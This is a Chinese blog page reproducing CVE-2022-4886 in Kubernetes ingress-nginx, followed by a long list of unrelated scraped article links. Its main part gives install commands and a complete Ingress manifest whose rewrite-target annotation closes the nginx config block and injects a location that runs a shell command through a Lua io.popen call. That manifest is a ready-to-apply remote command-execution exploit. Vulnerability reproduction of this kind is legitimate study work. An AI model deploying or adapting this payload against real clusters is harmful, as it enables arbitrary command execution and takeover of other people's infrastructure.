信安成长日记
信安成长日记

CVE-2022-4886 ingress命令注入复现与分析

安装

安装ingress-nginx

wget https://raw.githubusercontent.com/kubernetes/ingress-nginx/controller-v1.8.4/deploy/static/provider/cloud/deploy.yaml

k apply -f deploy.yaml

原理

nginx.ingress.kubernetes.io/rewrite-target标签会在nginx配置进行插入字符串,我们通过注入自己的恶意字符串,并且进行闭合,并且利用了lua脚本执行命令的功能,即可注入一个执行命令的路由来完成执行命令

 nginx.ingress.kubernetes.io/rewrite-target: |
      execute-command/ last;     #用于将所有请求重定向到/execute-command
      }
      #注入了一个新路径,用于通过lua脚本执行命令
      location execute-command/ {
        content_by_lua_block {
          local handle = io.popen("ls -l")
          local result = handle:read("*a")
          handle:close()
          ngx.say(result)
        }
      }
      location /fs/{

演示

部署的ingress如下所示 

apiVersion: networking.k8s.io/v1
kind: Ingress
metadata:
  name: ingress-exploit
  annotations:
    kubernetes.io/ingress.class: "nginx"
    nginx.ingress.kubernetes.io/rewrite-target: |
      execute-command/ last;
      }
      location execute-command/ {
        content_by_lua_block {
          local handle = io.popen("ls -l")
          local result = handle:read("*a")
          handle:close()
          ngx.say(result)
        }
      }
      location /fs/{

spec:
  rules:
  - host: k8s.evil.me
    http:
      paths:
      - path: /
        pathType: Prefix
        backend:
          service:
            name: exploit
            port:
              number: 8080

你可能感兴趣的:(linux)

  • linuxoracle查看用户权限_linux 下oracle 分配用户权限 weixin_39528994
    #su-oracle$sqlplus/nologSQL>connect/assysdba--//创建临时表空间createtemporarytablespacetest_temptempfile'/data/oracle/oradata/test/test_temp01.dbf'--//Linux下的文件系统size64mautoextendonnext64mmaxsize2048mextentm
  • ipmitool 无法远程操作服务器 零时搞学习 问题记录服务器运维
    问题描述:一台服务器,一台PC服务器,确认BMC用户名密码是Administrator权限,用户名密码都正确,可以正常登录到BMC,在另一台PC上的linux机器上安装了ipmitool后,使用命令对此服务器仅操作,无响应~~~Error如下:[root@sh-z390-01~]#ipmitool-Ilanplus-H172.16.10.118-Uroot-PadminpoweroffError:
  • linux shell let 零时搞学习 Linux系统Shelllinux服务器运维
    #let--helplet:letarg[arg...]id++,id--variablepost-increment,post-decrement++id,--idvariablepre-increment,pre-decrement-,+unaryminus,plus!,~logicalandbitwisenegation**exponentiation*,/,%multiplication,
  • RTC相关实验 耀。339 学习
    RTC也就是实时时钟,用于记录当前系统时间,对于Linux系统而言时间是非常重要的,就和我们使用Windows电脑或手机查看时间一样,我们在使用Linux设备的时候也需要查看时间。Linux内核RTC驱动简介RTC设备驱动是一个标准的字符设备驱动,应用程序通过open、release、read、write和ioctl等函数完成对RTC设备的操作。原理详讲1、6U内部自带到了一个RTC外设,确切的说
  • ARM/Linux嵌入式面经(三二):百度 TrustZone_Hcoco ARM/Linux嵌入式面试arm开发dubbo芯片嵌入式硬件单片机
    文章目录RTOS了解吗,展开讲一下对RTOS的线程和任务管理相关的有了解吗RTOS的线程和任务管理相关了解追问有深度的技术问题及答案vivado这个硬件平台怎么用的Vivado硬件平台使用了解追问有深度的技术问题及答案项目系统架构、配置是怎样的项目系统架构与配置系统架构配置追问有深度的技术问题及答案遇到的难点,怎么解决的?遇到的难点及解决方法追问有深度的技术问题及答案Linux上的异步IO了解过吗
  • ARM/Linux嵌入式面经(三十):腾讯 C++开发工程师 TrustZone_Hcoco ARM/Linux嵌入式面试arm开发linuxc++芯片嵌入式硬件单片机
    文章目录自我介绍:首先让我做了一个简短的自我介绍。volatile关键字:解释了volatile关键字的作用和使用场景。回答volatile关键字的作用和使用场景追问几个有深度的技术问题malloc底层:详细描述了malloc函数的底层实现机制。malloc函数的底层实现机制概述深度技术追问及答案虚函数:讲解了虚函数的概念和用途。回答虚函数的概念和用途追问有深度的技术问题及答案内联函数:解释了内联
  • Redis 在 Linux 环境中的基础语法与数据类型详解 J老熊 redislinux数据库系统架构运维
    Redis在Linux环境中的基础语法与数据类型详解Redis是一个开源的内存数据库,以其高效的性能和丰富的数据类型广泛应用于各种场景。本文将从Redis的基础语法入手,详细介绍Redis在Linux环境中的安装、配置及基本操作,并深入探讨Redis支持的各类数据类型,包括其使用场景及在Linux环境下的代码示例。所有示例均结合电商交易系统的实际需求,以便读者更好地理解和应用。第一章:Redis在
  • Redis在linux环境集群部署详细介绍 J老熊 redislinux数据库面试系统架构运维
    在分布式系统中,Redis作为一种高性能的内存数据库,常常被用于缓存、会话管理、实时数据分析等场景。而为了应对大规模数据存储和高可用性需求,Redis集群部署成为了必要的选择。本文将详细介绍如何在Linux环境下进行Redis集群部署,探讨不同的集群部署方式,并提供Docker部署示例。第1章:Redis集群概述Redis集群是一种分布式的Redis实例集合,通过数据分片(sharding)和复制
  • Linux之shell脚本的if分支 小橞 linux运维服务器
    if分支介绍shell脚本中的if分支语句,有编程基础的同学会感觉十分简单(其实就是想水一篇,周末一定补一篇高质量的)。if单分支格式if条件;then执行。。fiif双分支格式if条件;then执行。。else。。。。fivim自动缩进配置文件~/.vimrcif多分支if条件测试1;then命令序列1elif条件测试2;then命令序列2else命令序列nfi条件测试可以放命令,只要是可以分对
  • Nginx实现URL重写 dalaoyang
    本文利用Nginx实现URL重写,本文使用Nginx与静态页面配合重写URL。image1.准备工作。结合本文场景,需要安装Nginx。1.1关于Linux系统安装Nginx可以参考我的文章---(传送门)。2.什么是URL重写?URL重写是指将一个URL请求重新写成网站可以处理的另一个URL的过程。这样说可能不是很好理解,举个例子来说明一下,在开发中可能经常遇到这样的需求,比如通过浏览器请求的h
  • rh124第五章知识点问答----白熊的Linux学习之旅8 白白白白熊爱打APEX linux学习运维
    1.怎么理解I/O重定向?答:I/O重定向可以更改进程获取其输入或输出的方式。可以从执行文件读取或写入而不是键盘,可以将输出或错误保存到文件而不是终端。2./dev/null是什么,有什么用途?答:它是一个空的特殊文件,但系统会持续清除其内容,可以理解为Linux中的垃圾箱但不可回收;可以用来清除不需要显示或保存的输出或错误。3.解释下列命令的结果:&>/dev/null、2>>file答::将输
  • pcma和pcmu pcm编码_GitHub - mackenbaron/EasyAACEncoder: 简单、高效、稳定的开源音频编码库,支持将各种音频数据(G.711A/PCMA、G.711U/P... CLOUDU pcma和pcmupcm编码
    EasyAACEncoderEasyAACEncoder是EasyDarwin开源流媒体服务团队整理、开发的一款音频转码到AAC的工具库,目前支持G711a/G711u/G726/PCM等音频格式的转码,跨平台,支持Windows/Linux/arm.调用示例testEasyAACEncoder:通过EasyAACEncoderAPI对G711A/G711U/G726进行AAC转码;Windows
  • lnmp(linux nginx mysql php)动静分离web架构中,应用程序间是如何互动的? 2401_84019227 linuxnginxmysql
    linux操作系统,提供一个platform,架构的平台,是基础设施,不用多讲。nginx提供web服务功能,暴露80端口,让客户端通过ip地址来访问,访问什么呢?就是nginx的网页文件根目录里面放的文件内容。这些文件是固定的,所以叫静态页面。什么是固定的?也就是不和数据库交互的页面,叫做固定的,专业术语叫静态页面。这里的静态页面,容易引起误解,动图算不算静态页面?算,为什么,因为它是一个固定的
  • APP启动优化 Coder_Sven
    APP启动流程1,系统的启动1.打开电源引导芯片代码加载引导程序BootLoader到RAM中去执行2.BootLoader把操作系统拉起来3.Linux内核启动开始系统设置,找到一个init.rc文件启动初始化进程4.init进程初始化和启动属性服务,之后开启Zygote进程5.Zygote开始创建JVM并注册JNI方法,开启SystemServer6.启动Binder线程沲和SystemSer
  • 用Linux shell编的一个小计算器 deflag Linuxshelllinuxinput
    #!/bin/shecho-n"welcometomyprogrammingworld"echo-n"Thisprogramisacalculator"operator="+-x/exit"echo"pleaseinputtwodigits:"readnumber1number2selectiin$operatordocase$iin+)result=$(($number1+$number2))e
  • oracle 19c 克隆数据库到本地,感受丝般顺滑 whn1977 数据库oracle服务器
    我有个库,请在本地复制出一个新的。安排19c单机linux本机已经有一个实例apex,新实例名就叫orcl吧,数据要一样本机IP:192.168.1.2ORACLE_HOME:/u01/app/oracle/product/19.0.0/dbhome_1前提:源主机和目标主机相同。源数据库和复制数据库都使用OracleManagedFiles(OMF)管理数据库文件。重复的数据库文件使用与源数据库
  • ARM/Linux嵌入式面经(二九):经纬恒润Linux开发 TrustZone_Hcoco ARM/Linux嵌入式面试arm开发芯片单片机嵌入式硬件
    文章目录介绍自己的三个项目1.什么是内联函数和宏定义?内联函数与宏定义追问及答案2.宏定义作用在编译阶段的哪个阶段生效?3.指针和数组的异同指针和数组的异同追问几个有深度的技术问题4.讲一下结构体回答追问及答案5.结构体里面内存对齐的规则结构体内存对齐的规则追问几个有深度的技术问题6.结构体和联合体的关系与区别结构体(Struct)和联合体(Union)的关系与区别追问几个有深度的技术问题7.讲一
  • llama factory微调时出现x86_64-conda-linux-gnu/bin/ld: cannot find -lcurand: No such file or directory解决方案 爱编程的喵喵 Python基础课程pythonllamafactorycurand解决方案
      大家好,我是爱编程的喵喵。双985硕士毕业,现担任全栈工程师一职,热衷于将数据思维应用到工作与生活中。从事机器学习以及相关的前后端开发工作。曾在阿里云、科大讯飞、CCF等比赛获得多次Top名次。现为CSDN博客专家、人工智能领域优质创作者。喜欢通过博客创作的方式对所学的知识进行总结与归纳,不仅形成深入且独到的理解,而且能够帮助新手快速入门。  本文主要介绍了llamafactory微调时出现x
  • 【Linux 从基础到进阶】Apache服务器搭建与优化 爱技术的小伙子 Linux从基础到进阶服务器linuxapache
    Apache服务器搭建与优化引言ApacheHTTP服务器(简称Apache)是世界上使用最广泛的Web服务器之一,以其稳定性、灵活性和广泛的模块支持而著称。无论是初学者还是专业开发者,Apache都是一个强大且易于配置的Web服务器解决方案。本文将介绍在CentOS和Ubuntu系统上如何安装、配置Apache服务器,并提供一些优化策略以提高性能和安全性。1.Apache服务器的安装1.1在Ce
  • pdm定制install的别名i waketzheng python
    就像前端的npm一样npmi是命令npminstall的简写我希望后端的pdm命令和poetry也支持简写ipoetry的话,MacOS和Linux可使用carstino里的.pipi.py文件,Windows的待研究pdm则相对简单一点,只需配置shell命令时加多两行,变成如下即可:pdm(){localcommand=$1if[["$command"=="shell"]];theneval$
  • 初探UML(User-Mode-Linux) stxinu UbuntuLinuxkernelumllinux运维ubuntukernel
    由标题我们已经知道这里要说的UML不是“统一建模语言”,而是“用户模式的Linux”,使用它有什么好处呢?让我们先保留点神秘感,一步一步学习,通过实践来感悟它的魅力。实验环境:电脑一台(装有Ubuntu13.10系统,Kernel版本为3.11.0-12-generic,64位)下面将通过UML环境的搭建、GDB调试、网络测试这3个方面来了解下UML:一.搭建UML实验环境1.下载LinuxKer
  • 用python脚本监控阿里云或者linux,并触发报警维护机制 feiyu361 pythonlinux
    文章目录提示:只需要创建一个py文件用来30s监控计划,可以搭配我之前写的钉钉py文件,导入之后,触发钉钉报警#!/usr/bin/envpython#-*-coding:utf-8-*-#author:fly#datetime:2022/8/1610:25#software:PyCharmimportos,timeimportlogginglogging.basicConfig(level=lo
  • 银河麒麟v10-arm SEALOS离线部署k8s集群(v1.22.8) xjudt arm开发kubernetesdocker
    一、环境说明1.版本说明1.1.操作系统版本银河麒麟V10SP3[root@localhost~]#cat/etc/os-releaseNAME="KylinLinuxAdvancedServer"VERSION="V10(Lance)"ID="kylin"VERSION_ID="V10"PRETTY_NAME="KylinLinuxAdvancedServerV10(Lance)"ANSI_CO
  • Linux 服务器ping不通域名或者是curl域名不通的问题处理 疯狂的大狗 Linux服务器linux运维
    一.前言ping某个域名提示Nameorservicenotknown的错误,或者是curl域名提示Couldnotresolvehost的错误。这种问题通常是由于域名解析或网络连接问题引起的。二.问题原因这个问题可能有几种原因导致。1.DNS配置问题:确保计算机或网络设备的DNS配置正确2.检查域名拼写:确保输入的域名没有拼写错误。3.网络连接问题:检查服务器的网络连接,确保网络正常工作,尝试访
  • 如何在 MySQL 中使用 Socket 身份验证 ? 鸠摩智首席音效师 mysql数据库
    在MySQL和MariaDB中,可以使用socket身份验证,而不是传统的用户名和密码组合。这种方法既安全又方便,因为它使用的是操作系统的用户凭证。什么是Socket身份验证?Socket身份验证允许使用Unix或Linux用户凭证连接到数据库,这对于安全环境非常有用。这简化了登录过程,消除了频繁用户输入密码的要求。Step1:CreateaUnix/LinuxUser如果您还没有一个UNIX/L
  • linux mysql多实例部署(续) 及mysql主从 山客泛舟游Y mysqllinux数据库
    linuxmysql多实例部署(续)及mysql主从多实例部署(mysqld_multi)只能控制数据库启动及重启而不能关闭服务,所有采用配置systemctl启停多实例服务。[root@localhost~]#ll/opt/data/total12drwxr-xr-x.5mysqlmysql4096Jul2911:283306drwxr-xr-x.5mysqlmysql4096Jul2911:2
  • Linux 网络适配,ping命令,更改自己的IP地址 hardStudy_h LINUX笔记
    Linux系统下不同于Windows系统。Windoes系统下ping命令默认只发送接受四次数据,而Linux默认不会终止,可以通过Ctrl+C进行强制终止。第一步:确认自己的IP地址,只能更改最后一位,如图可以更改为198.168.1.xx且我的网卡名为:eth0CLC@Embed_Learn:~$ping192.168.1.88PING192.168.1.88(192.168.1.88)56(
  • 一键脚本安装汉化 Linux man 手册:提升你的命令行效率 云端梦留白 Linux系统Shell脚本linux运维服务器
    文章目录前言一、背景介绍1、汉化来源二、安装过程1、脚本内容2、预期效果3、不足之处总结前言  在Linux世界里,man手册是我们探索命令行工具的得力助手。然而,对于英语能力尚浅的Linux初学中用户来说,阅读英文man页面可能会遇到一些障碍。本文将向你展示如何通过一个简单的Shell部署脚本来实现Linuxman手册的一键汉化,让你的命令行体验更加流畅。  大家好,我是技术界的小萌新,今天要和
  • Linux 系统调优之安全防护1 云端梦留白 Linux系统Shell脚本linux安全网络服务器运维
    文章目录前言1、系统命令审计2、公网防护3、服务器使用秘钥登录4、默认账户及口令文件的防护5、其他配置总结前言  Linux系统以其开放性和强大的功能成为众多企业和开发者的首选。然而,开放性也带来了安全风险。本文将探讨Linux系统调优中的安全防护策略,分享并提供一系列实用的优化措施,确保系统在高效运行的同时,也能抵御潜在的网络威胁,减少日常使用的安全隐患。  大家好,我是技术界的小萌新,今天要和
  • linux使用vim修改文件内容 zqy1515 linuxvim运维
    1.进入vim输入vim文件名,此时进入命令行模式,此时还不能进行编辑。2.进入插入模式按一下字母i就可以进入插入模式,这时候你就可以开始输入文字了。3.保存修改按下esc推出编辑模式,回到命令行模式,然后输入:wq保存修改并退出vim.4.取消修改按下esc,输入q!取消修改并退出vim
  • JAVA基础 灵静志远 位运算加载Date字符串池覆盖
    一、类的初始化顺序 1 (静态变量,静态代码块)-->(变量,初始化块)--> 构造器 同一括号里的,根据它们在程序中的顺序来决定。上面所述是同一类中。如果是继承的情况,那就在父类到子类交替初始化。 二、String 1 String a = "abc"; JAVA虚拟机首先在字符串池中查找是否已经存在了值为"abc"的对象,根
  • keepalived实现redis主从高可用 bylijinnan redis
    方案说明 两台机器(称为A和B),以统一的VIP对外提供服务 1.正常情况下,A和B都启动,B会把A的数据同步过来(B is slave of A) 2.当A挂了后,VIP漂移到B;B的keepalived 通知redis 执行:slaveof no one,由B提供服务 3.当A起来后,VIP不切换,仍在B上面;而A的keepalived 通知redis 执行slaveof B,开始
  • java文件操作大全 0624chenhong java
    最近在博客园看到一篇比较全面的文件操作文章,转过来留着。 http://www.cnblogs.com/zhuocheng/archive/2011/12/12/2285290.html 转自http://blog.sina.com.cn/s/blog_4a9f789a0100ik3p.html 一.获得控制台用户输入的信息    &nbs
  • android学习任务 不懂事的小屁孩 工作
    任务 完成情况 搞清楚带箭头的pupupwindows和不带的使用 已完成 熟练使用pupupwindows和alertdialog,并搞清楚两者的区别 已完成 熟练使用android的线程handler,并敲示例代码 进行中 了解游戏2048的流程,并完成其代码工作 进行中-差几个actionbar 研究一下android的动画效果,写一个实例 已完成 复习fragem
  • zoom.js 换个号韩国红果果 oom
    它的基于bootstrap 的 https://raw.github.com/twbs/bootstrap/master/js/transition.js  transition.js模块引用顺序 <link rel="stylesheet" href="style/zoom.css"> <script src=&q
  • 详解Oracle云操作系统Solaris 11.2 蓝儿唯美 Solaris
    当Oracle发布Solaris 11时,它将自己的操作系统称为第一个面向云的操作系统。Oracle在发布Solaris 11.2时继续它以云为中心的基调。但是,这些说法没有告诉我们为什么Solaris是配得上云的。幸好,我们不需要等太久。Solaris11.2有4个重要的技术可以在一个有效的云实现中发挥重要作用:OpenStack、内核域、统一存档(UA)和弹性虚拟交换(EVS)。 
  • spring学习——springmvc(一) a-john springMVC
    Spring MVC基于模型-视图-控制器(Model-View-Controller,MVC)实现,能够帮助我们构建像Spring框架那样灵活和松耦合的Web应用程序。   1,跟踪Spring MVC的请求 请求的第一站是Spring的DispatcherServlet。与大多数基于Java的Web框架一样,Spring MVC所有的请求都会通过一个前端控制器Servlet。前
  • hdu4342 History repeat itself-------多校联合五 aijuans 数论
    水题就不多说什么了。 #include<iostream>#include<cstdlib>#include<stdio.h>#define ll __int64using namespace std;int main(){ int t; ll n; scanf("%d",&t); while(t--)
  • EJB和javabean的区别 asia007 beanejb
    EJB不是一般的JavaBean,EJB是企业级JavaBean,EJB一共分为3种,实体Bean,消息Bean,会话Bean,书写EJB是需要遵循一定的规范的,具体规范你可以参考相关的资料.另外,要运行EJB,你需要相应的EJB容器,比如Weblogic,Jboss等,而JavaBean不需要,只需要安装Tomcat就可以了   1.EJB用于服务端应用开发, 而JavaBeans
  • Struts的action和Result总结 百合不是茶 strutsAction配置Result配置
        一:Action的配置详解:      下面是一个Struts中一个空的Struts.xml的配置文件     <?xml version="1.0" encoding="UTF-8" ?> <!DOCTYPE struts PUBLIC &quo
  • 如何带好自已的团队 bijian1013 项目管理团队管理团队
    在网上看到博客" 怎么才能让团队成员好好干活"的评论,觉得写的比较好。 原文如下: 我做团队管理有几年了吧,我和你分享一下我认为带好团队的几点: 1.诚信         对团队内成员,无论是技术研究、交流、问题探讨,要尽可能的保持一种诚信的态度,用心去做好,你的团队会感觉得到。 2.努力提
  • Java代码混淆工具 sunjing ProGuard
    Open Source Obfuscators ProGuard http://java-source.net/open-source/obfuscators/proguardProGuard is a free Java class file shrinker and obfuscator. It can detect and remove unused classes, fields, m
  • 【Redis三】基于Redis sentinel的自动failover主从复制 bit1129 redis
    在第二篇中使用2.8.17搭建了主从复制,但是它存在Master单点问题,为了解决这个问题,Redis从2.6开始引入sentinel,用于监控和管理Redis的主从复制环境,进行自动failover,即Master挂了后,sentinel自动从从服务器选出一个Master使主从复制集群仍然可以工作,如果Master醒来再次加入集群,只能以从服务器的形式工作。   什么是Sentine
  • 使用代理实现Hibernate Dao层自动事务 白糖_ DAOspringAOP框架Hibernate
    都说spring利用AOP实现自动事务处理机制非常好,但在只有hibernate这个框架情况下,我们开启session、管理事务就往往很麻烦。 public void save(Object obj){ Session session = this.getSession(); Transaction tran = session.beginTransaction(); try
  • maven3实战读书笔记 braveCS maven3
    Maven简介 是什么? Is a software project management and comprehension tool.项目管理工具 是基于POM概念(工程对象模型) [设计重复、编码重复、文档重复、构建重复,maven最大化消除了构建的重复] [与XP:简单、交流与反馈;测试驱动开发、十分钟构建、持续集成、富有信息的工作区]     功能:
  • 编程之美-子数组的最大乘积 bylijinnan 编程之美
    public class MaxProduct { /** * 编程之美 子数组的最大乘积 * 题目: 给定一个长度为N的整数数组,只允许使用乘法,不能用除法,计算任意N-1个数的组合中乘积中最大的一组,并写出算法的时间复杂度。 * 以下程序对应书上两种方法,求得“乘积中最大的一组”的乘积——都是有溢出的可能的。 * 但按题目的意思,是要求得这个子数组,而不
  • 读书笔记-2 chengxuyuancsdn 读书笔记
    1、反射 2、oracle年-月-日 时-分-秒 3、oracle创建有参、无参函数 4、oracle行转列 5、Struts2拦截器 6、Filter过滤器(web.xml) 1、反射 (1)检查类的结构 在java.lang.reflect包里有3个类Field,Method,Constructor分别用于描述类的域、方法和构造器。 2、oracle年月日时分秒 s
  • [求学与房地产]慎重选择IT培训学校 comsci it
          关于培训学校的教学和教师的问题,我们就不讨论了,我主要关心的是这个问题       培训学校的教学楼和宿舍的环境和稳定性问题       我们大家都知道,房子是一个比较昂贵的东西,特别是那种能够当教室的房子... &nb
  • RMAN配置中通道(CHANNEL)相关参数 PARALLELISM 、FILESPERSET的关系 daizj oraclermanfilespersetPARALLELISM
    RMAN配置中通道(CHANNEL)相关参数 PARALLELISM 、FILESPERSET的关系 转 PARALLELISM --- 我们还可以通过parallelism参数来指定同时"自动"创建多少个通道: RMAN > configure device type disk parallelism 3 ; 表示启动三个通道,可以加快备份恢复的速度。
  • 简单排序:冒泡排序 dieslrae 冒泡排序
    public void bubbleSort(int[] array){ for(int i=1;i<array.length;i++){ for(int k=0;k<array.length-i;k++){ if(array[k] > array[k+1]){
  • 初二上学期难记单词三 dcj3sjt126com sciet
    concert 音乐会 tonight 今晚 famous 有名的;著名的 song 歌曲 thousand 千 accident 事故;灾难 careless 粗心的,大意的 break 折断;断裂;破碎 heart 心(脏) happen  偶尔发生,碰巧 tourist 旅游者;观光者 science (自然)科学 marry 结婚 subject 题目;
  • I.安装Memcahce 1. 安装依赖包libevent Memcache需要安装libevent,所以安装前可能需要执行 Shell代码 收藏代码 dcj3sjt126com redis
    wget http://download.redis.io/redis-stable.tar.gz tar xvzf redis-stable.tar.gz cd redis-stable make   前面3步应该没有问题,主要的问题是执行make的时候,出现了异常。 异常一: make[2]: cc: Command not found 异常原因:没有安装g
  • 并发容器 shuizhaosi888 并发容器
       通过并发容器来改善同步容器的性能,同步容器将所有对容器状态的访问都串行化,来实现线程安全,这种方式严重降低并发性,当多个线程访问时,吞吐量严重降低。    并发容器ConcurrentHashMap       替代同步基于散列的Map,通过Lock控制。   &nb
  • Spring Security(12)——Remember-Me功能 234390216 Spring SecurityRemember Me记住我
    Remember-Me功能   目录   1.1     概述 1.2     基于简单加密token的方法 1.3     基于持久化token的方法 1.4     Remember-Me相关接口和实现
  • 位运算 焦志广 位运算
    一、位运算符C语言提供了六种位运算符: & 按位与 | 按位或 ^ 按位异或 ~ 取反 << 左移 >> 右移 1. 按位与运算 按位与运算符"&"是双目运算符。其功能是参与运算的两数各对应的二进位相与。只有对应的两个二进位均为1时,结果位才为1 ,否则为0。参与运算的数以补码方式出现。 例如:9&am
  • nodejs 数据库连接 mongodb mysql liguangsong mongodbmysqlnode数据库连接
    1.mysql 连接    package.json中dependencies加入     "mysql":"~2.7.0"    执行 npm install      在config 下创建文件 database.js    
  • java动态编译 olive6615 javaHotSpotjvm动态编译
        在HotSpot虚拟机中,有两个技术是至关重要的,即动态编译(Dynamic compilation)和Profiling。     HotSpot是如何动态编译Javad的bytecode呢?Java bytecode是以解释方式被load到虚拟机的。HotSpot里有一个运行监视器,即Profile Monitor,专门监视
  • Storm0.9.5的集群部署配置优化 roadrunners 优化storm.yaml
    nimbus结点配置(storm.yaml)信息: # Licensed to the Apache Software Foundation (ASF) under one # or more contributor license agreements. See the NOTICE file # distributed with this work for additional inf
  • 101个MySQL 的调节和优化的提示 tomcat_oracle mysql
     1. 拥有足够的物理内存来把整个InnoDB文件加载到内存中——在内存中访问文件时的速度要比在硬盘中访问时快的多。   2. 不惜一切代价避免使用Swap交换分区 – 交换时是从硬盘读取的,它的速度很慢。   3. 使用电池供电的RAM(注:RAM即随机存储器)。   4. 使用高级的RAID(注:Redundant Arrays of Inexpensive Disks,即磁盘阵列
  • zoj 3829 Known Notation(贪心) 阿尔萨斯 ZOJ
    题目链接:zoj 3829 Known Notation 题目大意:给定一个不完整的后缀表达式,要求有2种不同操作,用尽量少的操作使得表达式完整。 解题思路:贪心,数字的个数要要保证比∗的个数多1,不够的话优先补在开头是最优的。然后遍历一遍字符串,碰到数字+1,碰到∗-1,保证数字的个数大于等1,如果不够减的话,可以和最后面的一个数字交换位置(用栈维护十分方便),因为添加和交换代价都是1
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他